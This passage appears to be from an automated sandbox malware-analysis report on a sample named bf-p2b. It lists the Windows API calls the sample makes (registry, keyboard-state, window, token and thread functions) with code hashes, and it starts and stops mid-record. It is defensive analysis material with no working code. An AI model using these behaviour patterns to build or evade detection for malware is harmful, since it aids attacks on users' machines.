                          • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00B62E1F
                          • RegEnumKeyExW.ADVAPI32(?,-00000001,?,?,00000000,00000000,00000000,?), ref: 00B62E66
                          • RegCloseKey.ADVAPI32(?,?), ref: 00B62E92
                          • RegCloseKey.ADVAPI32(00000000), ref: 00B62E9F
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                           • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: Close$BuffCharConnectEnumOpenRegistryUpper_memmove
                          • String ID:
                          • API String ID: 3440857362-0
                          • Opcode ID: e7cf44deeb294b8a3a640f32e8a6ae500c8b826a178191a7397dc569e85fa799
                          • Instruction ID: f8e62a176732fafa6f2e922b6fb4efaaf567b954e818f9c2393719f3f0b2f32c
                          • Opcode Fuzzy Hash: e7cf44deeb294b8a3a640f32e8a6ae500c8b826a178191a7397dc569e85fa799
                          • Instruction Fuzzy Hash: C3518D71204204AFD704EF64C891E6FBBE8FF88304F0449AEF595872A1DB35E905CB52
                          Uniqueness

                          Uniqueness Score: -1.00%

                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                           • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID:
                          • String ID:
                          • API String ID:
                          • Opcode ID: a99ea8394863be56998136ac7f9b0e5a0acf05f8b25c81e1cdea8be78926edb6
                          • Instruction ID: 74ddc2ddf33c9005d030d0e7f5a19965f92aec5313b81d6b765c7e122c6500c8
                          • Opcode Fuzzy Hash: a99ea8394863be56998136ac7f9b0e5a0acf05f8b25c81e1cdea8be78926edb6
                          • Instruction Fuzzy Hash: 8341C735904108AFD724DF68CC45FB9BFE5EB0A320F194296F999A72E1CB789D01DB90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • GetPrivateProfileSectionW.KERNEL32(00000003,?,00007FFF,?), ref: 00B517D4
                          • GetPrivateProfileSectionW.KERNEL32(?,00000001,00000003,?), ref: 00B517FD
                          • WritePrivateProfileSectionW.KERNEL32(?,?,?), ref: 00B5183C
                            • Part of subcall function 00B084A6: __swprintf.LIBCMT ref: 00B084E5
                            • Part of subcall function 00B084A6: __itow.LIBCMT ref: 00B08519
                          • WritePrivateProfileStringW.KERNEL32(00000003,00000000,00000000,?), ref: 00B51861
                          • WritePrivateProfileStringW.KERNEL32(00000000,00000000,00000000,?), ref: 00B51869
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                           • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: PrivateProfile$SectionWrite$String$__itow__swprintf
                          • String ID:
                          • API String ID: 1389676194-0
                          • Opcode ID: 7cade6f123db03dbdb9376f5eb67343251c645cd8d3789bfa01e4611e5a79771
                          • Instruction ID: 5c5be56e9caa8dc4e42b4cb0f36b068bf449a1be6d7d9a05defd112b707b2536
                          • Opcode Fuzzy Hash: 7cade6f123db03dbdb9376f5eb67343251c645cd8d3789bfa01e4611e5a79771
                          • Instruction Fuzzy Hash: DE411A75A00205DFCB11EF65C981AADBBF5EF08310B1480D9E849AB3A1DB31EE51DF61
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • GetCursorPos.USER32(000000FF), ref: 00B1B749
                          • ScreenToClient.USER32(00000000,000000FF), ref: 00B1B766
                          • GetAsyncKeyState.USER32(00000001), ref: 00B1B78B
                          • GetAsyncKeyState.USER32(00000002), ref: 00B1B799
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                           • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: AsyncState$ClientCursorScreen
                          • String ID:
                          • API String ID: 4210589936-0
                          • Opcode ID: 479ff85bca7ae43bb64e86263e38e9e60db3b3d97f15dea97c8ceb8e9f22a95b
                          • Instruction ID: ab75dff198ec8648552566fbb5047b62315f9c102128e4f1e368aa8b5e181293
                          • Opcode Fuzzy Hash: 479ff85bca7ae43bb64e86263e38e9e60db3b3d97f15dea97c8ceb8e9f22a95b
                          • Instruction Fuzzy Hash: 5A411D35504119BBDB159F64C884EE9BBB4FF49364F1083AAF839962D0CB30AD90DB91
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • GetWindowRect.USER32(?,?), ref: 00B3C156
                          • PostMessageW.USER32(?,00000201,00000001), ref: 00B3C200
                          • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00B3C208
                          • PostMessageW.USER32(?,00000202,00000000), ref: 00B3C216
                          • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00B3C21E
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                           • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: MessagePostSleep$RectWindow
                          • String ID:
                          • API String ID: 3382505437-0
                          • Opcode ID: 88b3cc2f6592400eae78c9eecaf6b1293c0e09a457f04946e84bb90c98c327a1
                          • Instruction ID: ab47fd14b73e3c4a20a337732c2a39608ad4dc6982cd5c3763c00df1f8b3d31f
                          • Opcode Fuzzy Hash: 88b3cc2f6592400eae78c9eecaf6b1293c0e09a457f04946e84bb90c98c327a1
                          • Instruction Fuzzy Hash: 7631BC71500619EBDB04DFA8DD4CA9E3FB5EF04325F204269F920BB1E1C7B09904EB90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • IsWindowVisible.USER32(?), ref: 00B3E9CD
                          • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 00B3E9EA
                          • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00B3EA22
                          • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 00B3EA48
                          • _wcsstr.LIBCMT ref: 00B3EA52
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                           • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                          • String ID:
                          • API String ID: 3902887630-0
                          • Opcode ID: bd564b4648ffa539c5c483ec53d137bb90801784bf3b2801ec5dff8dbd3b8131
                          • Instruction ID: 7a442edd7f49fed584c0b85f308638e8389844b5bfb85ae40c384d88130f153a
                          • Opcode Fuzzy Hash: bd564b4648ffa539c5c483ec53d137bb90801784bf3b2801ec5dff8dbd3b8131
                          • Instruction Fuzzy Hash: 8621F6722042147AEB15AB69EC49E7B7BE9EF45750F2080ABF809DA1E1EE71DC409760
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                            • Part of subcall function 00B1AF7D: GetWindowLongW.USER32(?,000000EB), ref: 00B1AF8E
                          • GetWindowLongW.USER32(?,000000F0), ref: 00B6DCC0
                          • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 00B6DCE4
                          • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 00B6DCFC
                          • GetSystemMetrics.USER32(00000004), ref: 00B6DD24
                          • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,00000000,?,00B5407D,00000000), ref: 00B6DD42
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                           • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                           • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: Window$Long$MetricsSystem
                          • String ID:
                          • API String ID: 2294984445-0
                          • Opcode ID: 48d0189437fef5c72a5f67b7c54ba5c5978154d532883bce3f7e05d88e1410b0
                          • Instruction ID: fcb47efb7b5597cb1896c366a66134c69c26af844eb29ccc2c2cc5e19ea3ace0
                          • Opcode Fuzzy Hash: 48d0189437fef5c72a5f67b7c54ba5c5978154d532883bce3f7e05d88e1410b0
                          • Instruction Fuzzy Hash: 1621B071B04215AFCB206F788C88B6937E4FB46364B150B75F926D72E0D7749810CB90
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00B3CA86
                            • Part of subcall function 00B07E53: _memmove.LIBCMT ref: 00B07EB9
                          • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00B3CAB8
                          • __itow.LIBCMT ref: 00B3CAD0
                          • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00B3CAF6
                          • __itow.LIBCMT ref: 00B3CB07
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: MessageSend$__itow$_memmove
                          • String ID:
                          • API String ID: 2983881199-0
                          • Opcode ID: a49f08dc782b11c12314278c3bf68ccf73ef40bdb10ab7a1f4337a95ff67c6c5
                          • Instruction ID: f18eeff555850e9ff0c3abd43727260b188a6396633d2c08b4fa63f2345c9538
                          • Opcode Fuzzy Hash: a49f08dc782b11c12314278c3bf68ccf73ef40bdb10ab7a1f4337a95ff67c6c5
                          • Instruction Fuzzy Hash: 9821C976B006187BDB21EAA4DC47EDEBFE9DF49750F2040A5F905F7191EA708D0583A0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • IsWindow.USER32(00000000), ref: 00B589CE
                          • GetForegroundWindow.USER32 ref: 00B589E5
                          • GetDC.USER32(00000000), ref: 00B58A21
                          • GetPixel.GDI32(00000000,?,00000003), ref: 00B58A2D
                          • ReleaseDC.USER32(00000000,00000003), ref: 00B58A68
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: Window$ForegroundPixelRelease
                          • String ID:
                          • API String ID: 4156661090-0
                          • Opcode ID: 84e2d743cacad0c90aa053cf137b66cb66bed6dcd5dc0efe7548b01c5c1e9e86
                          • Instruction ID: ee318afd4aa782c152c1e1a7a5e84e6d5fa41b7b958ba6f144d20cfb94ba4357
                          • Opcode Fuzzy Hash: 84e2d743cacad0c90aa053cf137b66cb66bed6dcd5dc0efe7548b01c5c1e9e86
                          • Instruction Fuzzy Hash: 15216375A00204AFDB00EF65CC89BAA7BF5EF48301F0484B9E949A73A1DF70AD45CB50
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,?,00000000), ref: 00B1B5EB
                          • SelectObject.GDI32(?,00000000), ref: 00B1B5FA
                          • BeginPath.GDI32(?), ref: 00B1B611
                          • SelectObject.GDI32(?,00000000), ref: 00B1B63B
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: ObjectSelect$BeginCreatePath
                          • String ID:
                          • API String ID: 3225163088-0
                          • Opcode ID: 33a118d13b7c7a17d678f90d45444c0f32fb87fb40e171498d388d463e7a553d
                          • Instruction ID: a23383c397f86dd9e4371e8188e68d4582510c1830c980423b1bfa666bbfedc1
                          • Opcode Fuzzy Hash: 33a118d13b7c7a17d678f90d45444c0f32fb87fb40e171498d388d463e7a553d
                          • Instruction Fuzzy Hash: CB218070804305EBDB10AF19DD88FE97BE9FB2A355F544556F455A31E1CB7088D1CB60
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • __calloc_crt.LIBCMT ref: 00B22E81
                          • CreateThread.KERNEL32(?,?,00B22FB7,00000000,?,?), ref: 00B22EC5
                          • GetLastError.KERNEL32 ref: 00B22ECF
                          • _free.LIBCMT ref: 00B22ED8
                          • __dosmaperr.LIBCMT ref: 00B22EE3
                            • Part of subcall function 00B2889E: __getptd_noexit.LIBCMT ref: 00B2889E
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: CreateErrorLastThread__calloc_crt__dosmaperr__getptd_noexit_free
                          • String ID:
                          • API String ID: 2664167353-0
                          • Opcode ID: fc4a6b284e8eac508b067f5df42805fbbe8329df1ca07a70bc9bc6c5fe1e2208
                          • Instruction ID: 5be6f5912a50707497124bad0fcc4fcd7439bcfd8cccaf0fed9da20128e63f21
                          • Opcode Fuzzy Hash: fc4a6b284e8eac508b067f5df42805fbbe8329df1ca07a70bc9bc6c5fe1e2208
                          • Instruction Fuzzy Hash: 8C11E132105326BF9721BFA5BC42DAB3BE8EF04770B1104A9F91CC61A1EF31D80197A0
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • GetUserObjectSecurity.USER32(?,?,?,00000000,?), ref: 00B3B903
                          • GetLastError.KERNEL32(?,00B3B3CB,?,?,?), ref: 00B3B90D
                          • GetProcessHeap.KERNEL32(00000008,?,?,00B3B3CB,?,?,?), ref: 00B3B91C
                          • RtlAllocateHeap.NTDLL(00000000,?,00B3B3CB), ref: 00B3B923
                          • GetUserObjectSecurity.USER32(?,?,00000000,?,?), ref: 00B3B93A
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: HeapObjectSecurityUser$AllocateErrorLastProcess
                          • String ID:
                          • API String ID: 883493501-0
                          • Opcode ID: c81a9a9ced46c985cb3ce41be66ee2f87f46d0fdce3692f6f07d221c398bdebf
                          • Instruction ID: b3e269f71f3cc4e89dd5f2d1a1523de62eb75d43216f3a6c0c83df5d29a9ba41
                          • Opcode Fuzzy Hash: c81a9a9ced46c985cb3ce41be66ee2f87f46d0fdce3692f6f07d221c398bdebf
                          • Instruction Fuzzy Hash: 6A013171241208BFDF159FA5DC88E6B3BADEF8A764B20056AF645D31A0DB71DC40DB60
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00B48371
                          • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00B4837F
                          • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?), ref: 00B48387
                          • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?), ref: 00B48391
                          • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?), ref: 00B483CD
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: PerformanceQuery$CounterSleep$Frequency
                          • String ID:
                          • API String ID: 2833360925-0
                          • Opcode ID: 86d2686d99b7e1f6533d701c4196014aff6fc24b2e33547d12dd019c9b123f88
                          • Instruction ID: ffa1076109f4be7545b48aef0de16cca7424a7243b19737c771c9ebf9c40d0f0
                          • Opcode Fuzzy Hash: 86d2686d99b7e1f6533d701c4196014aff6fc24b2e33547d12dd019c9b123f88
                          • Instruction Fuzzy Hash: F9011731D00619DBCF00AFA8E988AEEBBB8FF08B01F000496E541B3190DF749A50E7A5
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00B3B7A5
                          • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00B3B7AF
                          • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00B3B7BE
                          • RtlAllocateHeap.NTDLL(00000000,?,00000002), ref: 00B3B7C5
                          • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00B3B7DB
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: HeapInformationToken$AllocateErrorLastProcess
                          • String ID:
                          • API String ID: 47921759-0
                          • Opcode ID: 7dcc5708fc1675f1a350713a24392525892c434a9e93200e196877dbe6d62aa7
                          • Instruction ID: c8cab40f1fd23318f12779664c663e4e3cbb1fd0bb2a2e563e7b4c2901315839
                          • Opcode Fuzzy Hash: 7dcc5708fc1675f1a350713a24392525892c434a9e93200e196877dbe6d62aa7
                          • Instruction Fuzzy Hash: 5CF06271240304AFEB101FA9EC89E673BECFF86755F20405AFA41D71A0DB619C41CB61
                          Uniqueness

                          Uniqueness Score: -1.00%

                          APIs
                          • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00B3B806
                          • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00B3B810
                          • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00B3B81F
                          • RtlAllocateHeap.NTDLL(00000000,?,TokenIntegrityLevel), ref: 00B3B826
                          • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00B3B83C
                          Memory Dump Source
                          • Source File: 00000000.00000002.2919870370.0000000000B01000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B00000, based on PE: true
                          • Associated: 00000000.00000002.2919797498.0000000000B00000.00000002.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BAE000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BBA000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000BF5000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2919870370.0000000000C7D000.00000040.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920360041.0000000000C83000.00000080.00000001.01000000.00000003.sdmp
                          • Associated: 00000000.00000002.2920432807.0000000000C84000.00000004.00000001.01000000.00000003.sdmp
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_0_2_b00000_bf-p2b.jbxd
                          Similarity
                          • API ID: HeapInformationToken$AllocateErrorLastProcess
                          • String ID:
                          • API String ID: 47921759-0
                          • Opcode ID: d14586fa0ca475f9c49d650f7080b2a880bc94f0dc3d042ba5476e41f1a93b1a
                          • Instruction ID: ebb33046bc2189c8366ec2c70d47d4a06758122af2d523b087a315b425ec3d70
